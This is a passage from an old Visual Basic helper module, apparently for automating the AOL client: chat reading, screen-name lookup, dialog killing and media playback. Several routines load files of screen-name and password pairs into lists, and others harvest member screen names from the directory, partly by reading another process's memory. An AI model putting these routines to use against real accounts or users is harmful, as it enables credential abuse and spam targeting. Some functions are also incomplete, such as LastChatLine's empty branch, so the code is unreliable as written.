  5941. rCNTL& = FindWindowEx(rWin&, 0&, "_AOL_View", vbNullString)
  5942. End If
  5943.  
  5944. If rCNTL& = 0& Then LastChatLine = "": Exit Function
  5945.  
  5946. rText$ = GetText(rCNTL&)
  5947.  
  5948. 'use the below loop if you don't have vb6
  5949. 'Do
  5950. ' DoEvents
  5951. ' rChr& = InStr(rChr2& + 1, rText$, Chr(13))
  5952. ' If rChr& = 0& Then rChr& = rChr2&: Exit Do
  5953. '
  5954. ' rChr2& = InStr(rChr& + 1, rText$, Chr(13))
  5955. ' If rChr2& = 0& Then rChr& = rChr&: Exit Do
  5956. 'Loop
  5957.  
  5958.  
  5959. 'use this if you have vb6
  5960. End Function
  5961.  
  5962. Public Function LastChatLineMessage(ChatLine As String) As String
  5963. 'gets message from whatever string you put in
  5964. Dim msgColon As Long, msgName As String
  5965.  
  5966. msgColon& = InStr(1, ChatLine$, Chr(9))
  5967. msgName$ = Right(ChatLine$, Len(ChatLine$) - msgColon&)
  5968.  
  5969. If AOLVersion = "3" Or AOLVersion = "2.5" Then
  5970. If InStr(1, msgName$, vbNullChar) <> 0& Then
  5971. msgName$ = Left(msgName$, InStr(1, msgName$, vbNullChar) - 1)
  5972. End If
  5973. End If
  5974.  
  5975. LastChatLineMessage = msgName$
  5976. End Function
  5977.  
  5978. Public Function LineCount(Text As String) As Long
  5979. 'counts number of lines in a string
  5980. LineCount = StringCount(Text$, Chr(13))
  5981. End Function
  5982.  
  5983.  
  5984.  
  5985. Public Sub ListTo2Lists(firstlist As Control, List1 As Control, List2 As Control)
  5986. 'moves 1 list's items into 2 lists
  5987. Dim i As Long, strSN As String, strPW As String, lstInput As String
  5988.  
  5989. For i = 0 To firstlist.ListCount - 1
  5990. lstInput$ = firstlist.list(i)
  5991. If InStr(1, lstInput$, ":") <> 0& Then
  5992. strSN$ = Left(lstInput$, InStr(1, lstInput$, ":") - 1)
  5993. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, ":"))
  5994. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  5995. List1.AddItem strSN$
  5996. List2.AddItem strPW$
  5997. End If
  5998. End If
  5999. Next i
  6000. End Sub
  6001.  
  6002. Public Sub Load2Combos(ComboSN As ComboBox, ComboPW As ComboBox, Target As String)
  6003. 'self explanatory
  6004. On Error Resume Next
  6005.  
  6006. Dim lstInput As String, strSN As String, strPW As String
  6007.  
  6008. Open Target$ For Input As #1
  6009. While Not EOF(1) = True
  6010. DoEvents
  6011. Input #1, lstInput$
  6012. If InStr(1, lstInput$, ":") <> 0& Then
  6013. strSN$ = Left(lstInput$, InStr(1, lstInput$, ":") - 1)
  6014. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, ":"))
  6015. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6016. ComboSN.AddItem strSN$
  6017. ComboPW.AddItem strPW$
  6018. End If
  6019. ElseIf InStr(1, lstInput$, "-") Then
  6020. strSN$ = Left(lstInput$, InStr(1, lstInput$, "-") - 1)
  6021. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "-"))
  6022. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6023. ComboSN.AddItem strSN$
  6024. ComboPW.AddItem strPW$
  6025. End If
  6026. ElseIf InStr(1, lstInput$, "=") Then
  6027. strSN$ = Left(lstInput$, InStr(1, lstInput$, "=") - 1)
  6028. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "="))
  6029. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6030. ComboSN.AddItem strSN$
  6031. ComboPW.AddItem strPW$
  6032. End If
  6033. ElseIf InStr(1, lstInput$, "·") Then
  6034. strSN$ = Left(lstInput$, InStr(1, lstInput$, "·") - 1)
  6035. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "·"))
  6036. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6037. ComboSN.AddItem Trim(strSN$)
  6038. ComboPW.AddItem Trim(strPW$)
  6039. End If
  6040. End If
  6041. Wend
  6042. Close #1
  6043. End Sub
  6044.  
  6045. Public Sub Load2Lists(ListSN As Control, ListPW As Control, Target As String)
  6046. 'self explanatory
  6047. On Error Resume Next
  6048.  
  6049. Dim lstInput As String, strSN As String, strPW As String
  6050.  
  6051. If FileExists(Target$) = True Then
  6052. Open Target$ For Input As #1
  6053. While Not EOF(1) = True
  6054. 'DoEvents
  6055. Input #1, lstInput$
  6056. If InStr(1, lstInput$, "]-[") <> 0& And InStr(1, lstInput$, "=") <> 0& Then
  6057. lstInput$ = Mid(lstInput$, InStr(1, lstInput$, "]-[") + 3, Len(lstInput$) - 6)
  6058. strSN$ = Left(lstInput$, InStr(1, lstInput$, "=") - 1)
  6059. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "="))
  6060. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6061. ListSN.AddItem Trim(strSN$)
  6062. ListPW.AddItem Trim(strPW$)
  6063. End If
  6064. ElseIf InStr(1, lstInput$, ":") <> 0& Then
  6065. strSN$ = Left(lstInput$, InStr(1, lstInput$, ":") - 1)
  6066. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, ":"))
  6067. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6068. ListSN.AddItem Trim(strSN$)
  6069. ListPW.AddItem Trim(strPW$)
  6070. End If
  6071. ElseIf InStr(1, lstInput$, "-") Then
  6072. strSN$ = Left(lstInput$, InStr(1, lstInput$, "-") - 1)
  6073. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "-"))
  6074. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6075. ListSN.AddItem Trim(strSN$)
  6076. ListPW.AddItem Trim(strPW$)
  6077. End If
  6078. ElseIf InStr(1, lstInput$, "=") Then
  6079. strSN$ = Left(lstInput$, InStr(1, lstInput$, "=") - 1)
  6080. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "="))
  6081. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6082. ListSN.AddItem Trim(strSN$)
  6083. ListPW.AddItem Trim(strPW$)
  6084. End If
  6085. ElseIf InStr(1, lstInput$, "·") Then
  6086. strSN$ = Left(lstInput$, InStr(1, lstInput$, "·") - 1)
  6087. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, "·"))
  6088. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6089. ListSN.AddItem Trim(strSN$)
  6090. ListPW.AddItem Trim(strPW$)
  6091. End If
  6092. End If
  6093. Wend
  6094. Close #1
  6095. End If
  6096. End Sub
  6097.  
  6098. Public Sub Load2ListsMp3(ListSN As ListBox, ListPW As ListBox, Target As String)
  6099. 'self explanatory
  6100. On Error Resume Next
  6101.  
  6102. Dim lstInput As String, strSN As String, strPW As String
  6103.  
  6104. If FileExists(Target$) = True Then
  6105. Open Target$ For Input As #1
  6106. While Not EOF(1) = True
  6107. 'DoEvents
  6108. Input #1, lstInput$
  6109. If InStr(1, lstInput$, ":") <> 0& Then
  6110. strSN$ = Left(lstInput$, InStr(1, lstInput$, ":") - 1)
  6111. strPW$ = Right(lstInput$, Len(lstInput$) - InStr(1, lstInput$, ":"))
  6112. If Trim(strSN$) <> "" And Trim(strPW$) <> "" Then
  6113. ListSN.AddItem strSN$
  6114. ListPW.AddItem strPW$
  6115. End If
  6116. End If
  6117. Wend
  6118. Close #1
  6119. End If
  6120. End Sub
  6121.  
  6122. Public Sub LoadCombo(FileName As String, Combo As ComboBox)
  6123. 'self explanatory
  6124. Dim lstInput As String
  6125. On Error Resume Next
  6126. Open FileName$ For Input As #1
  6127. While Not EOF(1)
  6128. Input #1, lstInput$
  6129. DoEvents
  6130. Combo.AddItem ReplaceText(lstInput$, "@aol.com", "")
  6131. Wend
  6132. Close #1
  6133. End Sub
  6134.  
  6135. Public Sub loadlist(FileName As String, list As Control)
  6136. 'self explanatory
  6137. Dim lstInput As String
  6138. On Error Resume Next
  6139. Open FileName$ For Input As #1
  6140. While Not EOF(1)
  6141. Input #1, lstInput$
  6142. 'DoEvents
  6143. list.AddItem ReplaceText(lstInput$, "@aol.com", "")
  6144. Wend
  6145. Close #1
  6146. End Sub
  6147.  
  6148. Public Sub LoadText(Text As String, FileName As String)
  6149. 'self explanatory
  6150. On Error Resume Next
  6151. Open FileName$ For Input As #1
  6152. Text$ = Input(LOF(1), #1)
  6153. Close #1
  6154. End Sub
  6155.  
  6156. Public Function cformat(number As Long) As String
  6157. If IsNumeric(number&) = False Then Exit Function
  6158. If number& = 0 Then
  6159. cformat$ = "0"
  6160. Else
  6161. cformat$ = Format(number&, "###,###")
  6162. End If
  6163. End Function
  6164.  
  6165. Public Function Locate(screenname As String) As String
  6166. 'function - returns where the screen name is.
  6167. 'example:
  6168. 'Call ChatSend("" + Locate("TOSAdvisor") + "")
  6169. Dim lWin As Long, lStatic As Long, mWin As Long, mBut As Long, lString As String
  6170.  
  6171. Call Keyword("aol://3548:" + screenname$)
  6172.  
  6173. Do
  6174. DoEvents
  6175. lWin& = FindLocate
  6176. lStatic& = FindWindowEx(lWin&, 0&, "_AOL_Static", vbNullString)
  6177.  
  6178. mWin& = FindWindow("#32770", "America Online")
  6179. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  6180. Loop Until lWin& <> 0& Or mWin& <> 0& And mBut& <> 0&
  6181.  
  6182. If lWin& <> 0& Then
  6183. lString$ = GetText(lStatic&)
  6184. Call PostMessage(lWin&, WM_CLOSE, 0&, 0&)
  6185. Locate = lString$
  6186. ElseIf mWin& <> 0& Then
  6187. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6188. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  6189. Call PostMessage(lWin&, WM_CLOSE, 0&, 0&)
  6190. Locate = ""
  6191. End If
  6192. End Function
  6193.  
  6194. Public Function Locate25(screenname As String) As String
  6195. 'function - returns where the screen name is.
  6196.  
  6197. 'example:
  6198. 'Call ChatSend("" + Locate("696969") + "")
  6199. Dim lWin As Long, lStatic As Long, mWin As Long, mBut As Long, lString As String
  6200.  
  6201. Call KeyWord25("aol://3548:" + screenname$)
  6202.  
  6203. Do
  6204. DoEvents
  6205. lWin& = FindLocate
  6206. lStatic& = FindWindowEx(lWin&, 0&, "_AOL_Static", vbNullString)
  6207.  
  6208. mWin& = FindWindow("#32770", "America Online")
  6209. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK")
  6210. Loop Until lWin& <> 0& Or mWin& <> 0& And mBut& <> 0&
  6211.  
  6212. If lWin& <> 0& Then
  6213. lString$ = GetText(lStatic&)
  6214. Call PostMessage(lWin&, WM_CLOSE, 0&, 0&)
  6215. Locate25 = lString$
  6216. ElseIf mWin& <> 0& Then
  6217. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6218. Call PostMessage(mBut&, WM_KEYUP, VK_SPACE, 0&)
  6219. Call PostMessage(lWin&, WM_CLOSE, 0&, 0&)
  6220. Locate25 = screenname$ + " - offline or ghosting"
  6221. End If
  6222. End Function
  6223.  
  6224. Public Function LTrim(Text As String) As String
  6225. 'just makes the text lcase'd and trimspace'd
  6226. LTrim$ = LCase(TrimSpaces(Text$))
  6227. End Function
  6228.  
  6229.  
  6230. Sub Make3d(frm As Form, Ctl As Control)
  6231. 'makes control '3d'
  6232. frm.ScaleMode = 3
  6233. frm.CurrentX = Ctl.Left - 1
  6234. frm.CurrentY = Ctl.Top + Ctl.Height
  6235. frm.Line -Step(0, -(Ctl.Height + 1)), RGB(92, 92, 92)
  6236. frm.Line -Step(Ctl.Width + 1, 0), RGB(92, 92, 92)
  6237. frm.Line -Step(0, Ctl.Height + 1), RGB(255, 255, 255)
  6238. frm.Line -Step(-(Ctl.Width + 1), 0), RGB(255, 255, 255)
  6239. End Sub
  6240.  
  6241. Public Sub MaximizeWindow(hWnd As Long)
  6242. 'self explanatory
  6243. Call ShowWindow(hWnd&, SW_MAXIMIZE)
  6244. End Sub
  6245.  
  6246. Public Sub MemberGather(Search As String, lst As ListBox, AddOnliners As Boolean)
  6247. 'searches for the 'search' string,
  6248. 'checks the 'return online members only' checkbox [depending on how you set the 'addonliners' property],
  6249. 'and then adds the search matches to a listbox [lst]
  6250. 'it will only add the screen names
  6251. Dim aol As Long, mdi As Long
  6252. Dim mWin As Long, medit As Long, micon As Long, mCheck As Long, mCheckState As Long
  6253. Dim sWin As Long, sList As Long, sIcon As Long, sCount As Long, sStatic As Long, sString As String
  6254. Dim mgWin As Long, mgBut As Long, firstcount As Long, SecondCount As Long
  6255.  
  6256. aol& = FindWindow("AOL Frame25", vbNullString)
  6257. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6258. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  6259.  
  6260. If mWin& = 0& Then
  6261. Call Keyword("profile")
  6262. End If
  6263.  
  6264. Do
  6265. DoEvents
  6266. aol& = FindWindow("AOL Frame25", vbNullString)
  6267. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6268. mWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory")
  6269. medit& = FindWindowEx(mWin&, 0&, "_AOL_Edit", vbNullString)
  6270. micon& = FindWindowEx(mWin&, 0&, "_AOL_Icon", vbNullString)
  6271. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  6272. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  6273. micon& = FindWindowEx(mWin&, micon&, "_AOL_Icon", vbNullString)
  6274. mCheck& = FindWindowEx(mWin&, 0&, "_AOL_Checkbox", vbNullString)
  6275. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  6276. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  6277. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  6278. mCheck& = FindWindowEx(mWin&, mCheck&, "_AOL_Checkbox", vbNullString)
  6279. Loop Until mWin& <> 0& And medit& <> 0& And micon& <> 0& And mCheck& <> 0&
  6280.  
  6281. If AddOnliners = True Then
  6282. Do
  6283. DoEvents
  6284. Call SendMessage(mCheck&, WM_LBUTTONDOWN, 0&, 0&)
  6285. Call SendMessage(mCheck&, WM_LBUTTONUP, 0&, 0&)
  6286. mCheckState& = SendMessage(mCheck&, BM_GETCHECK, 0&, 0&)
  6287. Loop Until mCheckState& = 1&
  6288. ElseIf AddOnliners = False Then
  6289. Do
  6290. DoEvents
  6291. Call SendMessage(mCheck&, WM_LBUTTONDOWN, 0&, 0&)
  6292. Call SendMessage(mCheck&, WM_LBUTTONUP, 0&, 0&)
  6293. mCheckState& = SendMessage(mCheck&, BM_GETCHECK, 0&, 0&)
  6294. Loop Until mCheckState& = 0&
  6295. End If
  6296.  
  6297. Call SendMessageByString(medit&, WM_SETTEXT, 0&, Search$)
  6298.  
  6299. Call SendMessageLong(medit&, WM_CHAR, ENTER_KEY, 0&)
  6300. Call SendMessage(micon&, WM_LBUTTONDOWN, 0&, 0&)
  6301. Call SendMessage(micon&, WM_LBUTTONUP, 0&, 0&)
  6302.  
  6303. Do
  6304. DoEvents
  6305. mgWin& = FindWindow("#32770", "America Online")
  6306. mgBut& = FindWindowEx(mgWin&, 0&, "Button", "OK")
  6307. aol& = FindWindow("AOL Frame25", vbNullString)
  6308. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6309. sWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Member Directory Search Results")
  6310. sList& = FindWindowEx(sWin&, 0&, "_AOL_Listbox", vbNullString)
  6311. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  6312. sStatic& = FindWindowEx(sWin&, 0&, "_AOL_Static", vbNullString)
  6313. Loop Until mgWin& <> 0& And mgBut& <> 0& Or sWin& <> 0& And sList& <> 0& And sIcon& <> 0& And sStatic& <> 0&
  6314.  
  6315. If mgWin& <> 0& Then
  6316. Call PostMessage(mgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6317. Call PostMessage(mgBut&, WM_KEYUP, VK_SPACE, 0&)
  6318. ElseIf sWin& <> 0& Then
  6319. Do
  6320. DoEvents
  6321. sCount& = SendMessage(sList&, LB_GETCOUNT, 0&, 0&)
  6322. Loop Until sCount& <> 0&
  6323.  
  6324. pause (0.6)
  6325.  
  6326. BeforeClick:
  6327.  
  6328. sIcon& = FindWindowEx(sWin&, 0&, "_AOL_Icon", vbNullString)
  6329. Call SendMessage(sIcon&, WM_LBUTTONDOWN, 0&, 0&)
  6330. Call SendMessage(sIcon&, WM_LBUTTONUP, 0&, 0&)
  6331.  
  6332. Do
  6333. DoEvents
  6334. firstcount& = SendMessage(sList&, LB_GETCOUNT, 0&, 0&)
  6335. pause (0.6)
  6336. SecondCount& = SendMessage(sList&, LB_GETCOUNT, 0&, 0&)
  6337. mgWin& = FindWindow("#32770", "America Online")
  6338. mgBut& = FindWindowEx(mgWin&, 0&, "Button", "OK")
  6339. Loop Until firstcount& <> SecondCount& Or mgWin& <> 0& And mgBut& <> 0&
  6340.  
  6341. If mgWin& <> 0& And mgBut& <> 0& Then
  6342. Call PostMessage(mgBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6343. Call PostMessage(mgBut&, WM_KEYUP, VK_SPACE, 0&)
  6344. Call MemberList(sList&, lst)
  6345. Call PostMessage(sWin&, WM_CLOSE, 0&, 0&)
  6346. ElseIf firstcount& <> SecondCount& Then
  6347. GoTo BeforeClick
  6348. End If
  6349. End If
  6350. End Sub
  6351.  
  6352. Public Sub MemberList(AOLLst As Long, list As ListBox)
  6353. 'adds the m/d list w/o all the other crap
  6354. 'on it, such as the tab's, their member name etc..
  6355. On Error Resume Next
  6356. Dim cProcess As Long, itmHold As Long, screenname As String
  6357. Dim psnHold As Long, rBytes As Long, Index As Long, Room As Long
  6358. Dim rList As Long, sThread As Long, mThread As Long
  6359. Dim Ta As Long, Ta2 As Long
  6360.  
  6361. rList& = AOLLst
  6362. If rList& = 0& Then Exit Sub
  6363.  
  6364. sThread& = GetWindowThreadProcessId(rList, cProcess&)
  6365. mThread& = OpenProcess(PROCESS_READ Or RIGHTS_REQUIRED, False, cProcess&)
  6366. If mThread& Then
  6367. For Index& = 0 To SendMessage(rList, LB_GETCOUNT, 0, 0) - 1
  6368. screenname$ = String$(4, vbNullChar)
  6369. itmHold& = SendMessage(rList, LB_GETITEMDATA, ByVal CLng(Index&), ByVal 0&)
  6370. itmHold& = itmHold& + 24
  6371. Call ReadProcessMemory(mThread&, itmHold&, screenname$, 4, rBytes)
  6372. Call CopyMemory(psnHold&, ByVal screenname$, 4)
  6373. psnHold& = psnHold& + 6
  6374. screenname$ = String$(16, vbNullChar)
  6375. Call ReadProcessMemory(mThread&, psnHold&, screenname$, Len(screenname$), rBytes&)
  6376. screenname$ = Left$(screenname$, InStr(screenname$, vbNullChar) - 1)
  6377. 'if the following looks familiar
  6378. 'it's because i gave eses my m/d
  6379. 'gather code [when we were cool]
  6380. Ta& = InStr(1, screenname$, Chr(9))
  6381. Ta2& = InStr(Ta& + 1, screenname$, Chr(9))
  6382. screenname$ = Mid(screenname$, Ta& + 1, Ta2& - 2)
  6383. screenname$ = ReplaceText(screenname$, Chr(9), "")
  6384. list.AddItem Trim(screenname$)
  6385. Next Index&
  6386. Call CloseHandle(mThread)
  6387. End If
  6388. End Sub
  6389.  
  6390. Public Sub MIDI_Play(MIDI As String)
  6391. 'self explanatory
  6392. If FileExists(MIDI$) = True Then
  6393. Call MciSendString("play " & MIDI$, 0&, 0, 0)
  6394. End If
  6395. End Sub
  6396.  
  6397. Public Sub MIDI_Stop(MIDI As String)
  6398. 'self explanatory
  6399. If FileExists(MIDI$) = True Then
  6400. Call MciSendString("stop " & MIDI$, 0&, 0, 0)
  6401. End If
  6402. End Sub
  6403.  
  6404. Public Sub MIDI_Pause(MIDI As String)
  6405. 'self explanatory
  6406. If FileExists(MIDI$) = True Then
  6407. Call MciSendString("pause " & MIDI$, 0&, 0, 0)
  6408. End If
  6409. End Sub
  6410.  
  6411. Public Sub MinimizeWelcome()
  6412. 'minimize's aol's welcome screen
  6413. Dim aol As Long, mdi As Long, Channels As Long, MainMenu As Long
  6414.  
  6415. aol& = FindWindow("AOL Frame25", vbNullString)
  6416. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6417.  
  6418. If FindWelcome& <> 0& Then
  6419. Call ShowWindow(FindWelcome&, SW_MINIMIZE)
  6420. End If
  6421.  
  6422. Channels& = FindWindowEx(mdi&, 0&, "AOL Child", "Channels")
  6423. MainMenu& = FindWindowEx(mdi&, 0&, "AOL Child", "Main Menu")
  6424.  
  6425. If Channels& <> 0& Then
  6426. Call PostMessage(Channels&, WM_CLOSE, 0&, 0&)
  6427. End If
  6428.  
  6429. If MainMenu& <> 0& Then
  6430. Call PostMessage(MainMenu&, WM_CLOSE, 0&, 0&)
  6431. End If
  6432. End Sub
  6433.  
  6434. Public Sub MinimizeWindow(hWnd As Long)
  6435. 'self explanatory
  6436. Call ShowWindow(hWnd&, SW_MINIMIZE)
  6437. End Sub
  6438.  
  6439. Public Function ModalKill() As Long
  6440. Dim mWin As Long, mCount As Long
  6441.  
  6442. 'this function counts the number of modals
  6443. 'that were killed [and kills them];
  6444. 'to use it, try:
  6445. '
  6446. 'mKilled& = ModalKill&
  6447. 'call MsgBox("" + mKilled& + " modals destroyed.", vbInformation + vbOkOnly, "modal kill")
  6448.  
  6449. Do
  6450. DoEvents
  6451. mWin& = FindWindow("_AOL_Modal", vbNullString)
  6452. If mWin& <> 0& Then
  6453. Call PostMessage(mWin&, WM_CLOSE, 0&, 0&)
  6454. mCount& = mCount& + 1
  6455. End If
  6456. Loop Until mWin& = 0&
  6457.  
  6458. ModalKill& = mCount&
  6459.  
  6460. End Function
  6461.  
  6462. Public Function Mp3TotalTime(Ocx As Control) As String
  6463. 'gets the total time of an mp3 song [use mp3play1.ocx]
  6464. Dim strMp3 As Long, MinCount As Long
  6465.  
  6466. If Ocx.TotalTime = 0 Then
  6467. Mp3TotalTime$ = "0:00"
  6468. Exit Function
  6469. End If
  6470.  
  6471. strMp3& = Left(Ocx.GetWaveLengthSecs, InStr(1, Ocx.GetWaveLengthSecs, ".") - 1)
  6472.  
  6473. Do While strMp3& > 60
  6474. strMp3& = strMp3& - 60
  6475. MinCount& = MinCount& + 1
  6476. Loop
  6477.  
  6478. If Len(Str(MinCount&)) = 2 Then
  6479. Mp3TotalTime$ = MinCount& & ":" & strMp3&
  6480. Else
  6481. Mp3TotalTime$ = MinCount& & ":0" & strMp3&
  6482. End If
  6483. End Function
  6484.  
  6485. Public Function Mp3TotalTimeSecs(Ocx As Control) As Long
  6486. 'gets total time of an mp3 [mp3play1.ocx]
  6487. Dim lngMp3 As Long
  6488.  
  6489. If Ocx.TotalTime = 0 Then
  6490. Mp3TotalTimeSecs& = "0"
  6491. Exit Function
  6492. End If
  6493.  
  6494. If InStr(1, Ocx.GetWaveLengthSecs, ".") <> 0& Then
  6495. lngMp3& = Left(Ocx.GetWaveLengthSecs, InStr(1, Ocx.GetWaveLengthSecs, ".") - 1)
  6496. Else
  6497. lngMp3& = Ocx.GetWaveLengthSecs
  6498. End If
  6499.  
  6500. Mp3TotalTimeSecs& = lngMp3&
  6501. End Function
  6502.  
  6503. Public Function Mp3Time(length As Long) As String
  6504. 'converts length into time
  6505. Dim Minutes As Long, Seconds As Long
  6506.  
  6507. If length& <= 9 Then
  6508. Mp3Time$ = "0:0" & length&
  6509. ElseIf length& >= 10 And length& <= 59 Then
  6510. Mp3Time$ = "0:" & length&
  6511. ElseIf length& >= 60 Then
  6512.  
  6513. Do While length& >= 60
  6514. length& = length& - 60
  6515. Minutes = Minutes + 1
  6516. Loop
  6517.  
  6518. If length& <= 9 Then
  6519. Mp3Time$ = Minutes& & ":0" & length&
  6520. Else
  6521. Mp3Time$ = Minutes& & ":" & length&
  6522. End If
  6523. End If
  6524.  
  6525. End Function
  6526.  
  6527. Public Function Mp3UnTime(Tme As String) As Long
  6528. 'converts time format into seconds
  6529. Dim Minutes As Long, Seconds As Long
  6530.  
  6531. Tme$ = ReplaceText(Tme$, "-", "")
  6532.  
  6533. If InStr(1, Tme$, ":") = 0& Then
  6534. Mp3UnTime = 0&
  6535. Exit Function
  6536. End If
  6537.  
  6538. Minutes& = Val(Left(Tme$, InStr(1, Tme$, ":") - 1))
  6539. Seconds& = Val(Right(Tme$, 2))
  6540.  
  6541. Seconds& = Val(Seconds&) + (Minutes& * 60)
  6542.  
  6543. Mp3UnTime = Seconds&
  6544.  
  6545. End Function
  6546.  
  6547. Public Function MsgKill() As Long
  6548. Dim mWin As Long, mBut As Long
  6549. Dim mBut2 As Long, mCount As Long
  6550.  
  6551. 'similar to modal kill, only it kills
  6552. 'aol's messageboxes..
  6553. 'ie: full rooms, system response,
  6554. 'deleting protected item errors, etc..
  6555.  
  6556. Do
  6557. DoEvents
  6558. mWin& = FindWindow("#32770", "America Online")
  6559. mBut& = FindWindowEx(mWin&, 0&, "Button", "OK") 'for msgboxes w/ 'ok' buttons
  6560. mBut2& = FindWindowEx(mWin&, 0&, "Button", "&No") 'for the msgboxes w/ 'no' buttons
  6561. If mWin& <> 0& Then
  6562. If mBut& <> 0& Then
  6563. Call PostMessage(mBut&, WM_KEYDOWN, VK_SPACE, 0&)
  6564. mCount& = mCount& + 1
  6565. ElseIf mBut2& <> 0& Then
  6566. Call PostMessage(mBut2&, WM_KEYDOWN, VK_SPACE, 0&)
  6567. mCount& = mCount& + 1
  6568. End If
  6569. End If
  6570. Loop Until mWin& = 0&
  6571.  
  6572. MsgKill& = mCount&
  6573.  
  6574. End Function
  6575.  
  6576. Public Sub OpenAddBuddy()
  6577. 'opens the addbuddy window on the buddylist
  6578. Dim aol As Long, mdi As Long, blwin As Long, BLIcon As Long
  6579. Dim SetupWin As Long, SetupList As Long, eblWin As Long, eblList As Long
  6580.  
  6581. aol& = FindWindow("AOL Frame25", vbNullString)
  6582. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6583. blwin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  6584.  
  6585. If aol& = 0 Then Exit Sub
  6586.  
  6587. If blwin& = 0 Then
  6588. Call Keyword("bv")
  6589. End If
  6590.  
  6591. Do
  6592. DoEvents
  6593. aol& = FindWindow("AOL Frame25", vbNullString)
  6594. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6595. blwin& = FindWindowEx(mdi&, 0&, "AOL Child", "Buddy List Window")
  6596. BLIcon& = FindWindowEx(blwin&, 0&, "_AOL_Icon", vbNullString)
  6597. BLIcon& = FindWindowEx(blwin&, BLIcon&, "_AOL_Icon", vbNullString)
  6598. BLIcon& = FindWindowEx(blwin&, BLIcon&, "_AOL_Icon", vbNullString)
  6599. Loop Until blwin& <> 0& And BLIcon& <> 0&
  6600.  
  6601. Call SendMessage(BLIcon&, WM_LBUTTONDOWN, 0&, 0&)
  6602. Call SendMessage(BLIcon&, WM_LBUTTONUP, 0&, 0&)
  6603.  
  6604. Do
  6605. DoEvents
  6606. SetupWin& = FindBuddyLists
  6607. SetupList& = FindWindowEx(SetupWin&, 0&, "_AOL_Listbox", vbNullString)
  6608. Loop Until SetupWin& <> 0& And SetupList& <> 0&
  6609.  
  6610. pause (0.3)
  6611.  
  6612. If SendMessage(SetupList&, LB_GETCOUNT, 0&, 0&) <> 0& Then
  6613. Call SendMessage(SetupList&, LB_SETCURSEL, 0&, 0&)
  6614. Call PostMessage(SetupList&, WM_LBUTTONDBLCLK, 0&, 0&)
  6615.  
  6616. Do
  6617. DoEvents
  6618. eblWin& = FindEditBuddyList
  6619. eblList& = FindWindowEx(eblWin&, 0&, "_AOL_Listbox", vbNullString)
  6620. Loop Until eblWin& <> 0& And eblList& <> 0&
  6621.  
  6622. pause (0.4)
  6623. End If
  6624. End Sub
  6625.  
  6626. Public Sub OpenPrefs()
  6627. 'opens aol's preferences
  6628. Dim aol As Long, mdi As Long, pWin As Long, pButton As Long
  6629.  
  6630. aol& = FindWindow("AOL Frame25", vbNullString)
  6631. mdi& = FindWindowEx(aol&, 0&, "MDIClient", vbNullString)
  6632.  
  6633. If AOLVersion = "4" Then
  6634. Call RunTBMenu(6&, 3&)
  6635. ElseIf AOLVersion = "5" Then
  6636. Call RunTBMenu(6&, 2&)
  6637. ElseIf AOLVersion = "2.5" Or AOLVersion = "3" Then
  6638. Call RunMenuByString("Preferences")
  6639. End If
  6640.  
  6641. Do
  6642. DoEvents
  6643. pWin& = FindWindowEx(mdi&, 0&, "AOL Child", "Preferences")
  6644. pButton& = FindWindowEx(pWin&, 0&, "_AOL_Icon", vbNullString)
  6645. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6646. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6647. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6648. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6649. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6650. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6651. pButton& = FindWindowEx(pWin&, pButton&, "_AOL_Icon", vbNullString)
  6652. Loop Until pWin& <> 0& And pButton& <> 0&
  6653. End Sub
  6654.  
  6655. Public Sub SetMailPrefs()
